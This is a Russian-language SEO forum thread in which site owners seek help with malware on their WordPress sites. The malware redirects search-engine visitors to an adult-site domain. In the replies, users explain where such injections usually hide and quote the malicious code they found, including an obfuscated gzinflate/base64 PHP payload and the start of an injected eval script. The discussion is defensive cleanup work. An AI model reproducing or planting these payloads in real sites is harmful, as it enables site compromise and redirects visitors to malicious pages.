Вирус на сайте. - SEO форум MaulTalk.com

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

2 страниц

1 2 >

Вирус на сайте.

Опции

geryon

Topic Starter сообщение

31.7.2012, 10:57; Ответить: geryon

Сообщение #1

Участник

Группа: User
Сообщений: 221
Регистрация: 11.7.2012
Поблагодарили: 29 раз
Репутация:

Есть сайт на wp, хостится у iphoster.ru, то было время я на него не заходил, а он пролежал целый месяц по вине хостера, после чего мне сказали что сам виноват, надо следить за сайтами, круто, у них лег хост, а я виноват, ну дело не в этом.
На данный момент сайт выкинуло из поиска яндекса, я так понял по той причине, что переходя с поиска на сайт, всех перекидывает на http://mefound.sytes.net/?said=3333g&q= вот такие страницы, которые веду на адалт сайты. Может кто сталкивался? Как решить эту проблему?
Если переходить на сайт просто вводя адрес в браузерную строку, то все нормально, а если гугла или с яндекса(пока не выкинуло) то перекидывает вот сюда, самое удивительное то, что сайт вообще не трогал, ничего не загружал, и даже не заходил туда уже давно.
Помогите пожалуйста.

--------------------

Прогон по трастам ЭКОНОМ класса!!!

НОВАЯ СУПЕР БИРЖА

Ответить с цитированием данного сообщения

OMGet OMGet 31.7.2012, 11:01; Сообщений: 561 Поблагодарили: 221 раз Репутация: 27 Просмотр профиля	31.7.2012, 11:01; Ответить: OMGet Сообщение #2
Завсегдатай Группа: Active User Сообщений: 561 Регистрация: 7.11.2011 Поблагодарили: 221 раз Репутация: 27	вирус закодирован, перенаправляет смотря откуда пришел, чтобы не сразу спалила администрация, ищите в php файлах в закодированом виде, Раскодировать можно тут

kioto kioto 31.7.2012, 11:05; Сообщений: 283 Поблагодарили: 82 раза Репутация: 24 Просмотр профиля	31.7.2012, 11:05; Ответить: kioto Сообщение #3
Бывалый Группа: User Сообщений: 283 Регистрация: 7.5.2009 Поблагодарили: 82 раза Репутация: 24	Так вон же, в футере, перед тегом <body> три строки. Это оно и есть. Вероятнее всего будет в файлах html, js. Возможно, tpl, если используется Smarty. -------------------- Скачать сериалы бесплатно

geryon Topic Starter geryonTopic Starter 31.7.2012, 11:27; Сообщений: 221 Поблагодарили: 29 раз Репутация: 10 Просмотр профиля	Topic Starter 31.7.2012, 11:27; Ответить: geryon Сообщение #4
Участник Группа: User Сообщений: 221 Регистрация: 11.7.2012 Поблагодарили: 29 раз Репутация: 10	В подвале убрал но все равно. -------------------- Прогон по трастам ЭКОНОМ класса!!! НОВАЯ СУПЕР БИРЖА

kioto kioto 31.7.2012, 11:28; Сообщений: 283 Поблагодарили: 82 раза Репутация: 24 Просмотр профиля	31.7.2012, 11:28; Ответить: kioto Сообщение #5
Бывалый Группа: User Сообщений: 283 Регистрация: 7.5.2009 Поблагодарили: 82 раза Репутация: 24	Не убрали. Сами исходный код страницы посмотрите. Еще где-то есть. -------------------- Скачать сериалы бесплатно

zdev1l1990 zdev1l1990 31.7.2012, 11:37; Сообщений: 125 Поблагодарили: 16 раз Репутация: 2 Просмотр профиля	31.7.2012, 11:37; Ответить: zdev1l1990 Сообщение #6
Участник Группа: User Сообщений: 125 Регистрация: 19.7.2012 Поблагодарили: 16 раз Репутация: 2	помогите тоже определить где именно вирус?) http://nerpc.ru хром ругается... -------------------- Самый крутой хостинг Зарабатываю от 10к в мес. здесь. Покупаю/продаю сайты тут

kioto kioto 31.7.2012, 11:42; Сообщений: 283 Поблагодарили: 82 раза Репутация: 24 Просмотр профиля	31.7.2012, 11:42; Ответить: kioto Сообщение #7
Бывалый Группа: User Сообщений: 283 Регистрация: 7.5.2009 Поблагодарили: 82 раза Репутация: 24	zdev1l1990, самая первая строка, перед "<!DOCTYPE". Начинается: <script>try{eval("pro"+"totype")>0;}... Вообще, народ... Проверяете всегда следующее: 1. строки ПЕРЕД закрывающим тегом </body> 2. теги <script></script> 3. теги <iframe> 99% гадости цепляются именно сюда. Вычистите это - считайте, дело сделано. Наиболее часто атакуемые файлы: html/htm, js, php, tpl. Сообщение отредактировал kioto - 31.7.2012, 11:46 -------------------- Скачать сериалы бесплатно

geryon Topic Starter geryonTopic Starter 31.7.2012, 12:07; Сообщений: 221 Поблагодарили: 29 раз Репутация: 10 Просмотр профиля	Topic Starter 31.7.2012, 12:07; Ответить: geryon Сообщение #8
Участник Группа: User Сообщений: 221 Регистрация: 11.7.2012 Поблагодарили: 29 раз Репутация: 10	Ничего у меня не выходит Сделаю бесплатно прогон(который в подписи) тому, кто поможет решить эту проблему. -------------------- Прогон по трастам ЭКОНОМ класса!!! НОВАЯ СУПЕР БИРЖА

kioto kioto 31.7.2012, 12:08; Сообщений: 283 Поблагодарили: 82 раза Репутация: 24 Просмотр профиля	31.7.2012, 12:08; Ответить: kioto Сообщение #9
Бывалый Группа: User Сообщений: 283 Регистрация: 7.5.2009 Поблагодарили: 82 раза Репутация: 24	Мне Вы уже делали прогон . Но все равно давайте гляну. Доступ от фтп в личку скиньте. -------------------- Скачать сериалы бесплатно

zdev1l1990 zdev1l1990 31.7.2012, 12:12; Сообщений: 125 Поблагодарили: 16 раз Репутация: 2 Просмотр профиля	31.7.2012, 12:12; Ответить: zdev1l1990 Сообщение #10
Участник Группа: User Сообщений: 125 Регистрация: 19.7.2012 Поблагодарили: 16 раз Репутация: 2	да видел... найти не мог в каком файле... думал может подскажет кто, у кого было подобное, ща нашел уже. #c3284d# echo(gzinflate(base64_decode("hVTNbuMgEH4XpEq2rLpgBgxy6KWP0OOqhyjrbFC7cWRbq+1GffdlhhBotNVe0Gj8wfczk2yW3ex P6+M6v5/HX9u3ip3miTVsndb308jqRz587Lbr7lD9+b2rz6ND0HB0TIi+bQXnbWvxEEKE01iBZY9dgyXHrrUE0OE EAVhSg3caT0U1QEJLxElEKOAJYIXBe9gwvcSuJWYboB2hpLoCUISmpzgxQGYgEUF1eE0Z1NOFxwD1AoR b Cj8rHpBAlQhflUy6ATmhD75Vn3oK2cHoyysXnSL7y2FEAJDOnBuPWBKTxSXRWGuZDVLbWptDjLZEcVN9 y iB6oOy1QampR24oIUqQhmRvJqcAA0bOXunEebGgb+YW/RK4M5SCyhuRZZNT23fXyUYb8hNbnDFFVzos1H69D9bkiOA2ZpRYrEacg7Wl7phBIbDrE7IQaP+13cQfW QupUl+hlBx5jV26lV8F5CsTzHFzXsQNX9xSCteFp73+709Hoz6pcDdp2hJNkTrO2uX05teKtS2rh4Prh s UxNuynufKOD/fCqMZv+OCdaHx9fnU+AJbmeZ398Ue7n6efT4ft/DR9H6vjt9eXh8rfVYe6sXU9fPh9xUXnnBO8HqsldDYPl7+hvw=="))); #/c3284d# вот такого рода код нашел... закодирован просто был, что и осложнило поиск. -------------------- Самый крутой хостинг Зарабатываю от 10к в мес. здесь. Покупаю/продаю сайты тут

« Предыдущая тема · Программная часть · Следующая тема »

2 страниц

1 2 >

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Странный трафик на сайте длительное время	34	TABAK	9098	Вчера, 23:38 автор: Arsenwenger
CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте	37	CryptoCLoud	10822	Вчера, 15:37 автор: CryptoCLoud
Боты могут делать пушподписки на моём сайте?	3	Megaspryt	964	Вчера, 5:18 автор: Skyworker
Быстрый и качественный обмен на сайте Baksman.org Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк	53	Baksman	33836	23.4.2024, 11:29 автор: Baksman
Алтуально ли заработок на сайте? Оцение пожалуйста идею	10	hitman20	1894	1.2.2024, 5:37 автор: Liudmila

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 25.4.2024, 10:34

Дизайн